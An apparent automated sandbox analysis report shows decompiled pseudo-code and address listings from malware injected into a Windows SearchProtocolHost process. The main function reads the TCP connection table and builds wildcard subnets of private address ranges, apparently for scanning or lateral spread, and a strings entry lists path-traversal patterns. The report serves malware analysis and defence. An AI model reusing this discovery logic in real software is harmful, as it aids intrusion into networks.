                                                0x02faf740
                                                0x02faf742
                                                0x02faf744
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x02faf744
                                                0x02faf740
                                                0x02faf77c
                                                0x02faf781
                                                0x02faf784
                                                0x02faf786
                                                0x02faf788
                                                0x02faf788
                                                0x02faf740
                                                0x02faf740
                                                0x02faf742
                                                0x02faf744
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x02faf744
                                                0x02faf740
                                                0x02faf793
                                                0x02faf798
                                                0x02faf79b
                                                0x02faf79d
                                                0x02faf79f
                                                0x02faf79f
                                                0x02faf740
                                                0x02faf740
                                                0x02faf742
                                                0x02faf744
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x02faf744
                                                0x00000000
                                                0x02faf740
                                                0x02faf7aa
                                                0x02faf7af
                                                0x02faf7b2
                                                0x02faf7b4
                                                0x02faf7b6
                                                0x02faf7b6
                                                0x00000000
                                                0x02faf7b6
                                                0x02faf7bb
                                                0x02faf7be
                                                0x02faf7be
                                                0x02faf7c0
                                                0x02faf7c0
                                                0x02faf7c2
                                                0x02faf7c5
                                                0x02faf7c9
                                                0x02faf7c9
                                                0x02faf7cd
                                                0x02faf7e0
                                                0x02faf7ea
                                                0x02faf7ed
                                                0x02faf7f0
                                                0x02faf7f5
                                                0x02faf7fa
                                                0x02faf7ff
                                                0x02faf801
                                                0x02faf812
                                                0x02faf818
                                                0x02faf820
                                                0x02faf82e
                                                0x02faf839
                                                0x02faf842
                                                0x02faf842
                                                0x02faf847
                                                0x02faf803
                                                0x02faf803
                                                0x02faf806
                                                0x00000000
                                                0x02faf808
                                                0x02faf808
                                                0x02faf80b
                                                0x00000000
                                                0x02faf80d
                                                0x02faf80d
                                                0x02faf810
                                                0x00000000
                                                0x00000000
                                                0x02faf810
                                                0x02faf80b
                                                0x02faf806
                                                0x02faf852
                                                0x02faf856
                                                0x02faf859
                                                0x02faf85e
                                                0x02faf864
                                                0x02faf866
                                                0x02faf866
                                                0x02faf866
                                                0x02faf866
                                                0x02faf86d
                                                0x02faf872
                                                0x02faf874
                                                0x02faf874
                                                0x02faf874
                                                0x02faf874
                                                0x02faf87b
                                                0x02faf87d
                                                0x02faf87f
                                                0x02faf87f
                                                0x02faf87f
                                                0x02faf87f
                                                0x02faf886
                                                0x02faf88b
                                                0x02faf88d
                                                0x02faf88d
                                                0x02faf88d
                                                0x02faf88d
                                                0x02faf894
                                                0x02faf89e
                                                0x02faf8ab
                                                0x02faf8b6
                                                0x02faf8c3
                                                0x02faf8c8
                                                0x02faf8ce
                                                0x02faf8d2
                                                0x02faf8d4
                                                0x02faf8d9
                                                0x02faf8dd
                                                0x02faf8e3
                                                0x02faf8e9
                                                0x02faf8ef
                                                0x02faf8f5
                                                0x02faf8fb
                                                0x02faf901
                                                0x02fafa9f
                                                0x02fafa9f
                                                0x02faf907
                                                0x02faf907
                                                0x02faf90b
                                                0x02faf910
                                                0x02faf924
                                                0x02faf924
                                                0x02faf928
                                                0x02faf92d
                                                0x02faf935
                                                0x02faf939
                                                0x02faf940
                                                0x02faf940
                                                0x02faf942
                                                0x02faf944
                                                0x00000000
                                                0x00000000
                                                0x02faf946
                                                0x02faf948
                                                0x02faf95c
                                                0x02faf95c
                                                0x02faf94a
                                                0x02faf94a
                                                0x02faf94d
                                                0x02faf94d
                                                0x02faf950
                                                0x00000000
                                                0x02faf952
                                                0x02faf952
                                                0x02faf955
                                                0x02faf958
                                                0x02faf95a
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x02faf95a
                                                0x02faf950
                                                0x02faf965
                                                0x02faf965
                                                0x02faf967
                                                0x02faf988
                                                0x02faf98c
                                                0x02faf994
                                                0x02faf999
                                                0x02faf99e
                                                0x02faf9a2
                                                0x02faf9a7
                                                0x02faf9ae
                                                0x02faf9b4
                                                0x02faf9b8
                                                0x02faf9ba
                                                0x02faf9d5
                                                0x02faf9d9
                                                0x02faf9dc
                                                0x02faf9df
                                                0x02faf9e5
                                                0x02faf9e5
                                                0x02faf9ea
                                                0x02faf9f0
                                                0x02faf9f8
                                                0x02faf9fe
                                                0x02fafa05
                                                0x02fafa05
                                                0x02fafa09
                                                0x02fafa0b
                                                0x02fafa26
                                                0x02fafa2a
                                                0x02fafa2d
                                                0x02fafa30
                                                0x02fafa36
                                                0x02fafa36
                                                0x02fafa3b
                                                0x02fafa41
                                                0x02fafa49
                                                0x02fafa4f
                                                0x02fafa52
                                                0x02fafa57
                                                0x02fafa7d
                                                0x02fafa83
                                                0x02fafa83
                                                0x02fafa88
                                                0x02fafa8e
                                                0x02fafa96
                                                0x02fafa9c
                                                0x00000000
                                                0x02faf969
                                                0x02faf969
                                                0x02faf972
                                                0x02faf978
                                                0x02faf97a
                                                0x02faf97d
                                                0x02faf981
                                                0x02faf920
                                                0x00000000
                                                0x00000000
                                                0x02faf983
                                                0x02faf981
                                                0x00000000
                                                0x02faf967
                                                0x02faf960
                                                0x02faf962
                                                0x02faf962
                                                0x00000000
                                                0x02faf962
                                                0x02faf924
                                                0x02fafaa3
                                                0x02fafaa3
                                                0x02fafaa5
                                                0x02fafaa8
                                                0x02fafaad
                                                0x02fafaad
                                                0x02fafac3
                                                0x02fafacc
                                                0x02fafad5
                                                0x02fafadf
                                                0x00000000
                                                0x02fafadf
                                                0x02faf6f1
                                                0x02faf6f2
                                                0x02faf6f7
                                                0x00000000
                                                0x02faf6f7
                                                0x02faf6ef
                                                0x02faf690
                                                0x02faf696
                                                0x02faf69f
                                                0x02faf6a9
                                                0x02faf6a9
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x02faf53b
                                                0x02faf53e
                                                0x02faf56a
                                                0x02faf56f
                                                0x02faf573
                                                0x02faf577
                                                0x02faf581
                                                0x02faf58b
                                                0x02faf595
                                                0x02faf59f
                                                0x02faf5a9
                                                0x02faf5b3
                                                0x02faf5bd
                                                0x02faf5c7
                                                0x02faf5d2
                                                0x02faf5db
                                                0x02faf5e5
                                                0x02faf540
                                                0x02faf54c
                                                0x02faf54f
                                                0x02faf562
                                                0x02faf562
                                                0x02faf53e
                                                0x02faf539
                                                0x02faf51b
                                                0x00000000

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: /../$/..\$\../$\..\
                                                • API String ID: 0-3885502717
                                                • Opcode ID: 9514668eb6847c4257f9c8c1f582a0a69168aa6cd1f8387c2776cc653caa7946
                                                • Instruction ID: 9a8a821be379267d75c1395609cc6b378cb718a8073ffc6c9291d3dde94a21bb
                                                • Opcode Fuzzy Hash: 9514668eb6847c4257f9c8c1f582a0a69168aa6cd1f8387c2776cc653caa7946
                                                • Instruction Fuzzy Hash: 8702E7B1A043418FC725CF28C8A17A6BBE1BF85354F184B6DD9DA8F681C736E509CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02FB15D6 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E02FB15D6() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E02FB15E2); // executed
				return _t1;
			}




                                                0x02fb15db
                                                0x02fb15e1

                                                APIs
                                                • SetUnhandledExceptionFilter.KERNELBASE(Function_000115E2,02FB1014), ref: 02FB15DB
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled
                                                • String ID:
                                                • API String ID: 3192549508-0
                                                • Opcode ID: cc0237b9ef40b53beee8a6da82ab3bb8356973b41a424afd53a09153a35a7b7f
                                                • Instruction ID: 8743ad2b38db563fe0d1b1e8b3a557d961f358eed0400b56b81d9a26edb123b2
                                                • Opcode Fuzzy Hash: cc0237b9ef40b53beee8a6da82ab3bb8356973b41a424afd53a09153a35a7b7f
                                                • Instruction Fuzzy Hash:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02FA5200 Relevance: 33.6, APIs: 18, Strings: 1, Instructions: 399memorysleepCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 0 2fa5200-2fa5255 Sleep call 2fb3440 2 2fa525a-2fa5284 GetProcessHeap HeapAlloc 0->2 3 2fa528a 2->3 4 2fa57bb-2fa57d6 call 2fb0a5d 2->4 6 2fa5290-2fa52ad GetTcpTable 3->6 8 2fa52d8-2fa52ea GetTcpTable 6->8 9 2fa52af-2fa52d2 GetProcessHeap HeapFree GetProcessHeap HeapAlloc 6->9 10 2fa57b3-2fa57b9 GetProcessHeap HeapFree 8->10 11 2fa52f0-2fa52f8 8->11 9->4 9->8 10->4 12 2fa52fe-2fa5307 11->12 13 2fa5777-2fa57ab GetProcessHeap HeapFree Sleep GetProcessHeap HeapAlloc 11->13 14 2fa5310-2fa535d call 2fb3440 call 2fa5180 12->14 13->6 15 2fa57b1 13->15 20 2fa5389-2fa53ab 14->20 21 2fa535f-2fa5362 14->21 15->4 24 2fa53ad-2fa53af 20->24 25 2fa53b1-2fa53ba 20->25 22 2fa5377-2fa537a 21->22 23 2fa5364-2fa5367 21->23 29 2fa5741-2fa5765 22->29 30 2fa5380-2fa5383 22->30 28 2fa536d-2fa5370 23->28 23->29 26 2fa53c9-2fa53f7 call 2fa5a00 call 2fa6530 24->26 27 2fa53c0-2fa53c5 25->27 38 2fa545b 26->38 39 2fa53f9-2fa5403 26->39 27->27 31 2fa53c7 27->31 28->20 34 2fa5372 28->34 29->14 33 2fa576b-2fa5771 29->33 30->20 30->29 31->26 33->13 34->29 40 2fa545d-2fa546b 38->40 41 2fa5407-2fa5435 call 2fa51a0 39->41 42 2fa5405 39->42 43 2fa547a-2fa547c 40->43 44 2fa546d-2fa5475 call 2fa5cf0 40->44 51 2fa544f-2fa5454 41->51 52 2fa5437-2fa543f 41->52 42->41 43->29 47 2fa5482-2fa54a4 43->47 44->43 49 2fa54aa-2fa54b0 47->49 50 2fa54a6-2fa54a8 47->50 55 2fa54b3-2fa54b8 49->55 54 2fa54bc-2fa5506 call 2fa5a00 call 2fa64b0 50->54 51->40 53 2fa5456 51->53 56 2fa5441-2fa5444 52->56 57 2fa5446-2fa544a 52->57 53->38 64 2fa556a 54->64 65 2fa5508-2fa5512 54->65 55->55 59 2fa54ba 55->59 58 2fa544d 56->58 57->58 58->51 59->54 68 2fa556c-2fa556e 64->68 66 2fa5516-2fa5544 call 2fa51a0 65->66 67 2fa5514 65->67 78 2fa555e-2fa5563 66->78 79 2fa5546-2fa554e 66->79 67->66 70 2fa5600 68->70 71 2fa5574-2fa5596 68->71 75 2fa5606 70->75 72 2fa5598-2fa559a 71->72 73 2fa559c-2fa55a2 71->73 76 2fa55ae-2fa55fa call 2fa5a00 call 2fa57e0 GetTickCount 72->76 77 2fa55a5-2fa55aa 73->77 80 2fa5608-2fa5611 75->80 76->75 104 2fa55fc-2fa55fe 76->104 77->77 81 2fa55ac 77->81 78->68 85 2fa5565 78->85 83 2fa5550-2fa5553 79->83 84 2fa5555-2fa5559 79->84 86 2fa5613-2fa5625 80->86 87 2fa5655-2fa565f 80->87 81->76 91 2fa555c 83->91 84->91 85->64 92 2fa563a-2fa564e 86->92 93 2fa5627-2fa5634 call 2fa5cf0 86->93 88 2fa5682-2fa5684 87->88 89 2fa5661-2fa5673 87->89 88->29 95 2fa568a-2fa56ac 88->95 89->88 94 2fa5675-2fa567d call 2fa5cf0 89->94 91->78 92->87 93->92 94->88 100 2fa56ae-2fa56b0 95->100 101 2fa56b2-2fa56bb 95->101 103 2fa56c9-2fa5705 call 2fa5a00 call 2fa57e0 GetTickCount 100->103 105 2fa56c0-2fa56c5 101->105 111 2fa5707-2fa570f call 2fa5cf0 103->111 112 2fa5714-2fa573e call 2fab4e0 103->112 104->80 105->105 106 2fa56c7 105->106 106->103 111->112 112->29
                                                C-Code - Quality: 74%
                                                			E02FA5200(void* __ebx, void* __edi) {
				long _v8;
				char _v16;
				signed int _v20;
				char _v148;
				intOrPtr _v152;
				long _v156;
				char _v172;
				intOrPtr _v176;
				long _v180;
				char _v196;
				intOrPtr _v200;
				long _v204;
				char _v220;
				signed int _v224;
				long _v228;
				void* _v232;
				signed int _v236;
				intOrPtr _v240;
				signed int* _v244;
				signed int _v248;
				void* __esi;
				signed int _t127;
				signed int _t128;
				long* _t136;
				long* _t137;
				void* _t143;
				signed int _t155;
				intOrPtr* _t160;
				intOrPtr _t161;
				intOrPtr _t163;
				signed int _t164;
				signed int _t168;
				intOrPtr* _t171;
				intOrPtr* _t172;
				signed int _t173;
				intOrPtr _t179;
				intOrPtr _t183;
				intOrPtr _t186;
				signed int _t189;
				signed int _t193;
				intOrPtr* _t195;
				long _t196;
				signed int _t200;
				signed int _t207;
				void* _t215;
				signed int _t217;
				signed int _t218;
				signed int _t219;
				signed int* _t224;
				intOrPtr* _t225;
				signed int _t226;
				intOrPtr* _t229;
				signed int _t230;
				signed int _t232;
				signed int _t233;
				intOrPtr* _t237;
				signed int _t238;
				long _t242;
				long _t245;
				void* _t247;
				intOrPtr _t250;
				intOrPtr _t251;
				intOrPtr* _t253;
				void* _t254;
				void* _t255;
				void* _t256;
				signed int _t257;
				void* _t258;
				void* _t260;

				_push(0xffffffff);
				_push(E02FC456F);
				_push( *[fs:0x0]);
				_t127 =  *0x2fcf008; // 0x93ad1eea
				_t128 = _t127 ^ _t257;
				_v20 = _t128;
				_push(__edi);
				_push(_t128);
				 *[fs:0x0] =  &_v16;
				_v224 = 0;
				_v236 = 0;
				Sleep(0x1388); // executed
				E02FB3440(__edi,  &_v148, 0, 0x80);
				_t253 = GetProcessHeap;
				_t260 = _t258 - 0xe8 + 0xc;
				_v228 = 0;
				_t215 = HeapAlloc(GetProcessHeap(), 0, 0x18);
				_v232 = _t215;
				if(_t215 == 0) {
					L80:
					 *[fs:0x0] = _v16;
					_pop(_t254);
					return E02FB0A5D(_v20 ^ _t257, _t254);
				}
				_t250 = HeapFree;
				do {
					_t136 =  &_v228;
					_v228 = 0x18;
					__imp__GetTcpTable(_t215, _t136, 1);
					if(_t136 != 0x7a) {
						L4:
						_t137 =  &_v228;
						__imp__GetTcpTable(_t215, _t137, 1);
						if(_t137 != 0) {
							HeapFree(GetProcessHeap(), 0, _t215);
							goto L80;
						}
						_v240 = _t137;
						if( *_t215 <= _t137) {
							goto L77;
						}
						_t14 = _t215 + 0x10; // 0x10
						_t224 = _t14;
						_v244 = _t224;
						asm("o16 nop [eax+eax]");
						do {
							_t217 =  *_t224;
							_v248 = _t217;
							E02FB3440(_t250,  &_v148, 0, 0x80);
							_push(_t217 >> 0x00000010 & 0x000000ff);
							_push(_t217 >> 0x00000008 & 0x000000ff);
							E02FA5180( &_v148, 0x80, "%d.%d.%d.*", _t217 & 0x000000ff);
							_t260 = _t260 + 0x24;
							if(_t217 == 0xa) {
								L14:
								__eflags = _v148;
								_v152 = 0xf;
								_v156 = 0;
								_v172 = 0;
								if(_v148 != 0) {
									_t225 =  &_v148;
									_t24 = _t225 + 1; // 0x1
									_t246 = _t24;
									asm("o16 nop [eax+eax]");
									do {
										_t155 =  *_t225;
										_t225 = _t225 + 1;
										__eflags = _t155;
									} while (_t155 != 0);
									_t226 = _t225 - _t246;
									__eflags = _t226;
									L19:
									_push(_t226);
									_push( &_v148);
									E02FA5A00(_t217,  &_v172, _t250, _t253);
									_t250 =  *0x2fd6a8c;
									_t255 = E02FA6530( &_v172,  &_v172);
									_t160 =  *0x2fd6a8c;
									__eflags = _t255 - _t160;
									if(_t255 == _t160) {
										L29:
										_t253 = _t160;
										L30:
										_t161 = _v152;
										__eflags = _t253 - _t250;
										_t218 = _t217 & 0xffffff00 | _t253 == _t250;
										__eflags = _t161 - 0x10;
										if(_t161 >= 0x10) {
											__eflags = _t161 + 1;
											E02FA5CF0(_t218, _t246, _t250, _v172, _t161 + 1);
										}
										__eflags = _t218;
										if(_t218 == 0) {
											goto L75;
										} else {
											__eflags = _v148;
											_v152 = 0xf;
											_v156 = 0;
											_v172 = 0;
											if(_v148 != 0) {
												_t229 =  &_v148;
												_t50 = _t229 + 1; // 0x1
												_t246 = _t50;
												do {
													_t164 =  *_t229;
													_t229 = _t229 + 1;
													__eflags = _t164;
												} while (_t164 != 0);
												_t230 = _t229 - _t246;
												__eflags = _t230;
												L38:
												_push(_t230);
												_push( &_v148);
												E02FA5A00(_t218,  &_v172, _t250, _t253);
												_v8 = 0;
												_t251 =  *0x2fd6a54;
												_t168 = _v224 | 0x00000001;
												_v224 = _t168;
												_v236 = _t168;
												_t256 = E02FA64B0( &_v172,  &_v172);
												_t171 =  *0x2fd6a54;
												__eflags = _t256 - _t171;
												if(_t256 == _t171) {
													L48:
													_t253 = _t171;
													L49:
													__eflags = _t253 - _t251;
													if(_t253 == _t251) {
														_t250 = GetTickCount;
														L58:
														_t219 = 1;
														L59:
														_t232 = _v224;
														__eflags = _t232 & 0x00000002;
														if((_t232 & 0x00000002) != 0) {
															_t186 = _v176;
															_t232 = _t232 & 0xfffffffd;
															_v224 = _t232;
															__eflags = _t186 - 0x10;
															if(_t186 >= 0x10) {
																__eflags = _t186 + 1;
																E02FA5CF0(_t219, _t246, _t250, _v196, _t186 + 1);
																_t232 = _v224;
															}
															_v176 = 0xf;
															_v180 = 0;
															_v196 = 0;
														}
														_v8 = 0xffffffff;
														__eflags = _t232 & 0x00000001;
														if((_t232 & 0x00000001) != 0) {
															_t183 = _v152;
															_v224 = _t232 & 0xfffffffe;
															__eflags = _t183 - 0x10;
															if(_t183 >= 0x10) {
																__eflags = _t183 + 1;
																E02FA5CF0(_t219, _t246, _t250, _v172, _t183 + 1);
															}
														}
														__eflags = _t219;
														if(_t219 == 0) {
															goto L75;
														} else {
															__eflags = _v148;
															_v200 = 0xf;
															_v204 = 0;
															_v220 = 0;
															if(_v148 != 0) {
																_t172 =  &_v148;
																_t105 = _t172 + 1; // 0x1
																_t247 = _t105;
																do {
																	_t233 =  *_t172;
																	_t172 = _t172 + 1;
																	__eflags = _t233;
																} while (_t233 != 0);
																_t173 = _t172 - _t247;
																__eflags = _t173;
																L72:
																_push(_t173);
																_push( &_v148);
																E02FA5A00(_t219,  &_v220, _t250, _t253);
																_v8 = 2;
																_t253 = E02FA57E0( &_v220,  &_v220);
																 *_t253 = GetTickCount();
																_v8 = 0xffffffff;
																_t179 = _v200;
																__eflags = _t179 - 0x10;
																if(_t179 >= 0x10) {
																	__eflags = _t179 + 1;
																	E02FA5CF0(_t219, _t246, _t250, _v220, _t179 + 1);
																}
																_t246 = 0;
																__eflags = 0;
																_v200 = 0xf;
																_v204 = 0;
																_v220 = 0;
																E02FAB4E0(_t219,  &_v248, 0, _t250, 1);
																_t260 = _t260 + 4;
																goto L75;
															}
															_t173 = 0;
															goto L72;
														}
													}
													__eflags = _v148;
													_v176 = 0xf;
													_v180 = 0;
													_v196 = 0;
													if(_v148 != 0) {
														_t237 =  &_v148;
														_t76 = _t237 + 1; // 0x1
														_t246 = _t76;
														do {
															_t189 =  *_t237;
															_t237 = _t237 + 1;
															__eflags = _t189;
														} while (_t189 != 0);
														_t238 = _t237 - _t246;
														__eflags = _t238;
														L55:
														_push(_t238);
														_push( &_v148);
														E02FA5A00(_t218,  &_v196, _t251, _t253);
														_v8 = 1;
														_t193 = _v224 | 0x00000002;
														_v224 = _t193;
														_v236 = _t193;
														_t195 = E02FA57E0( &_v196,  &_v196);
														_t250 = GetTickCount;
														_t253 = _t195;
														_t196 = GetTickCount();
														__eflags = _t196 -  *_t253 - 0x493e0;
														if(_t196 -  *_t253 > 0x493e0) {
															goto L58;
														}
														_t219 = 0;
														goto L59;
													}
													_t238 = 0;
													goto L55;
												}
												__eflags =  *((intOrPtr*)(_t256 + 0x24)) - 0x10;
												_t59 = _t256 + 0x10; // 0x10
												_t246 = _t59;
												_t218 =  *(_t246 + 0x10);
												if( *((intOrPtr*)(_t256 + 0x24)) >= 0x10) {
													_t246 =  *_t246;
												}
												__eflags = _v152 - 0x10;
												_t241 =  >=  ? _v172 :  &_v172;
												__eflags = _v156 - _t218;
												_t199 =  <  ? _v156 : _t218;
												_t200 = E02FA51A0( >=  ? _v172 :  &_v172, _t246,  <  ? _v156 : _t218);
												_t260 = _t260 + 4;
												__eflags = _t200;
												if(__eflags == 0) {
													_t242 = _v156;
													__eflags = _t242 - _t218;
													if(_t242 >= _t218) {
														__eflags = _t242 - _t218;
														_t68 = _t242 != _t218;
														__eflags = _t68;
														_t200 = 0 | _t68;
													} else {
														_t200 = _t200 | 0xffffffff;
													}
													__eflags = _t200;
												}
												if(__eflags == 0) {
													goto L49;
												} else {
													_t171 =  *0x2fd6a54;
													goto L48;
												}
											}
											_t230 = 0;
											goto L38;
										}
									}
									__eflags =  *((intOrPtr*)(_t255 + 0x24)) - 0x10;
									_t29 = _t255 + 0x10; // 0x10
									_t246 = _t29;
									_t217 =  *(_t246 + 0x10);
									if( *((intOrPtr*)(_t255 + 0x24)) >= 0x10) {
										_t246 =  *_t246;
									}
									__eflags = _v152 - 0x10;
									_t244 =  >=  ? _v172 :  &_v172;
									__eflags = _v156 - _t217;
									_t206 =  <  ? _v156 : _t217;
									_t207 = E02FA51A0( >=  ? _v172 :  &_v172, _t246,  <  ? _v156 : _t217);
									_t260 = _t260 + 4;
									__eflags = _t207;
									if(__eflags == 0) {
										_t245 = _v156;
										__eflags = _t245 - _t217;
										if(_t245 >= _t217) {
											__eflags = _t245 - _t217;
											_t38 = _t245 != _t217;
											__eflags = _t38;
											_t207 = 0 | _t38;
										} else {
											_t207 = _t207 | 0xffffffff;
										}
										__eflags = _t207;
									}
									if(__eflags == 0) {
										goto L30;
									} else {
										_t160 =  *0x2fd6a8c;
										goto L29;
									}
								}
								_t226 = 0;
								goto L19;
							}
							if(_t217 != 0xac) {
								__eflags = _t217 - 0xc0;
								if(_t217 != 0xc0) {
									goto L75;
								}
								__eflags = _t217 - 0xa8;
								if(_t217 != 0xa8) {
									goto L75;
								}
								goto L14;
							}
							if(_t217 < 0x10) {
								goto L75;
							}
							if(_t217 <= 0x1f) {
								goto L14;
							}
							L75:
							_t215 = _v232;
							_t163 = _v240 + 1;
							_t224 =  &(_v244[5]);
							_v240 = _t163;
							_v244 = _t224;
						} while (_t163 <  *_t215);
						_t253 = GetProcessHeap;
						_t250 = HeapFree;
						goto L77;
					}
					HeapFree(GetProcessHeap(), 0, _t215);
					_t215 = HeapAlloc(GetProcessHeap(), 0, _v228);
					_v232 = _t215;
					if(_t215 == 0) {
						goto L80;
					}
					goto L4;
					L77:
					HeapFree(GetProcessHeap(), 0, _t215);
					Sleep(0x1388);
					_v228 = 0;
					_t143 = HeapAlloc(GetProcessHeap(), 0, 0x18);
					_t215 = _t143;
					_v232 = _t143;
				} while (_t215 != 0);
				goto L80;
			}








































































                                                0x02fa5203
                                                0x02fa5205
                                                0x02fa5210
                                                0x02fa5217
                                                0x02fa521c
                                                0x02fa521e
                                                0x02fa5223
                                                0x02fa5224
                                                0x02fa5228
                                                0x02fa5235
                                                0x02fa523b
                                                0x02fa5241
                                                0x02fa5255
                                                0x02fa525a
                                                0x02fa5260
                                                0x02fa5263
                                                0x02fa527a
                                                0x02fa527c
                                                0x02fa5284
                                                0x02fa57bb
                                                0x02fa57be
                                                0x02fa57c7
                                                0x02fa57d6
                                                0x02fa57d6
                                                0x02fa528a
                                                0x02fa5290
                                                0x02fa5292
                                                0x02fa5298
                                                0x02fa52a4
                                                0x02fa52ad
                                                0x02fa52d8
                                                0x02fa52da
                                                0x02fa52e2
                                                0x02fa52ea
                                                0x02fa57b9
                                                0x00000000
                                                0x02fa57b9
                                                0x02fa52f0
                                                0x02fa52f8
                                                0x00000000
                                                0x00000000
                                                0x02fa52fe
                                                0x02fa52fe
                                                0x02fa5301
                                                0x02fa5307
                                                0x02fa5310
                                                0x02fa5310
                                                0x02fa5320
                                                0x02fa5326
                                                0x02fa5333
                                                0x02fa533c
                                                0x02fa5352
                                                0x02fa5357
                                                0x02fa535d
                                                0x02fa5389
                                                0x02fa5389
                                                0x02fa5390
                                                0x02fa539a
                                                0x02fa53a4
                                                0x02fa53ab
                                                0x02fa53b1
                                                0x02fa53b7
                                                0x02fa53b7
                                                0x02fa53ba
                                                0x02fa53c0
                                                0x02fa53c0
                                                0x02fa53c2
                                                0x02fa53c3
                                                0x02fa53c3
                                                0x02fa53c7
                                                0x02fa53c7
                                                0x02fa53c9
                                                0x02fa53c9
                                                0x02fa53d0
                                                0x02fa53d7
                                                0x02fa53dc
                                                0x02fa53ee
                                                0x02fa53f0
                                                0x02fa53f5
                                                0x02fa53f7
                                                0x02fa545b
                                                0x02fa545b
                                                0x02fa545d
                                                0x02fa545d
                                                0x02fa5463
                                                0x02fa5465
                                                0x02fa5468
                                                0x02fa546b
                                                0x02fa546d
                                                0x02fa5475
                                                0x02fa5475
                                                0x02fa547a
                                                0x02fa547c
                                                0x00000000
                                                0x02fa5482
                                                0x02fa5482
                                                0x02fa5489
                                                0x02fa5493
                                                0x02fa549d
                                                0x02fa54a4
                                                0x02fa54aa
                                                0x02fa54b0
                                                0x02fa54b0
                                                0x02fa54b3
                                                0x02fa54b3
                                                0x02fa54b5
                                                0x02fa54b6
                                                0x02fa54b6
                                                0x02fa54ba
                                                0x02fa54ba
                                                0x02fa54bc
                                                0x02fa54bc
                                                0x02fa54c3
                                                0x02fa54ca
                                                0x02fa54cf
                                                0x02fa54dc
                                                0x02fa54e2
                                                0x02fa54e5
                                                0x02fa54eb
                                                0x02fa54fd
                                                0x02fa54ff
                                                0x02fa5504
                                                0x02fa5506
                                                0x02fa556a
                                                0x02fa556a
                                                0x02fa556c
                                                0x02fa556c
                                                0x02fa556e
                                                0x02fa5600
                                                0x02fa5606
                                                0x02fa5606
                                                0x02fa5608
                                                0x02fa5608
                                                0x02fa560e
                                                0x02fa5611
                                                0x02fa5613
                                                0x02fa5619
                                                0x02fa561c
                                                0x02fa5622
                                                0x02fa5625
                                                0x02fa5627
                                                0x02fa562f
                                                0x02fa5634
                                                0x02fa5634
                                                0x02fa563a
                                                0x02fa5644
                                                0x02fa564e
                                                0x02fa564e
                                                0x02fa5655
                                                0x02fa565c
                                                0x02fa565f
                                                0x02fa5661
                                                0x02fa566a
                                                0x02fa5670
                                                0x02fa5673
                                                0x02fa5675
                                                0x02fa567d
                                                0x02fa567d
                                                0x02fa5673
                                                0x02fa5682
                                                0x02fa5684
                                                0x00000000
                                                0x02fa568a
                                                0x02fa568a
                                                0x02fa5691
                                                0x02fa569b
                                                0x02fa56a5
                                                0x02fa56ac
                                                0x02fa56b2
                                                0x02fa56b8
                                                0x02fa56b8
                                                0x02fa56c0
                                                0x02fa56c0
                                                0x02fa56c2
                                                0x02fa56c3
                                                0x02fa56c3
                                                0x02fa56c7
                                                0x02fa56c7
                                                0x02fa56c9
                                                0x02fa56c9
                                                0x02fa56d0
                                                0x02fa56d7
                                                0x02fa56e2
                                                0x02fa56ef
                                                0x02fa56f3
                                                0x02fa56f5
                                                0x02fa56fc
                                                0x02fa5702
                                                0x02fa5705
                                                0x02fa5707
                                                0x02fa570f
                                                0x02fa570f
                                                0x02fa5716
                                                0x02fa5716
                                                0x02fa5718
                                                0x02fa5728
                                                0x02fa5732
                                                0x02fa5739
                                                0x02fa573e
                                                0x00000000
                                                0x02fa573e
                                                0x02fa56ae
                                                0x00000000
                                                0x02fa56ae
                                                0x02fa5684
                                                0x02fa5574
                                                0x02fa557b
                                                0x02fa5585
                                                0x02fa558f
                                                0x02fa5596
                                                0x02fa559c
                                                0x02fa55a2
                                                0x02fa55a2
                                                0x02fa55a5
                                                0x02fa55a5
                                                0x02fa55a7
                                                0x02fa55a8
                                                0x02fa55a8
                                                0x02fa55ac
                                                0x02fa55ac
                                                0x02fa55ae
                                                0x02fa55ae
                                                0x02fa55b5
                                                0x02fa55bc
                                                0x02fa55c1
                                                0x02fa55ce
                                                0x02fa55d1
                                                0x02fa55d7
                                                0x02fa55e4
                                                0x02fa55e9
                                                0x02fa55ef
                                                0x02fa55f1
                                                0x02fa55f5
                                                0x02fa55fa
                                                0x00000000
                                                0x00000000
                                                0x02fa55fc
                                                0x00000000
                                                0x02fa55fc
                                                0x02fa5598
                                                0x00000000
                                                0x02fa5598
                                                0x02fa5508
                                                0x02fa550c
                                                0x02fa550c
                                                0x02fa550f
                                                0x02fa5512
                                                0x02fa5514
                                                0x02fa5514
                                                0x02fa5516
                                                0x02fa5525
                                                0x02fa552c
                                                0x02fa5532
                                                0x02fa553a
                                                0x02fa553f
                                                0x02fa5542
                                                0x02fa5544
                                                0x02fa5546
                                                0x02fa554c
                                                0x02fa554e
                                                0x02fa5557
                                                0x02fa5559
                                                0x02fa5559
                                                0x02fa5559
                                                0x02fa5550
                                                0x02fa5550
                                                0x02fa5550
                                                0x02fa555c
                                                0x02fa555c
                                                0x02fa5563
                                                0x00000000
                                                0x02fa5565
                                                0x02fa5565
                                                0x00000000
                                                0x02fa5565
                                                0x02fa5563
                                                0x02fa54a6
                                                0x00000000
                                                0x02fa54a6
                                                0x02fa547c
                                                0x02fa53f9
                                                0x02fa53fd
                                                0x02fa53fd
                                                0x02fa5400
                                                0x02fa5403
                                                0x02fa5405
                                                0x02fa5405
                                                0x02fa5407
                                                0x02fa5416
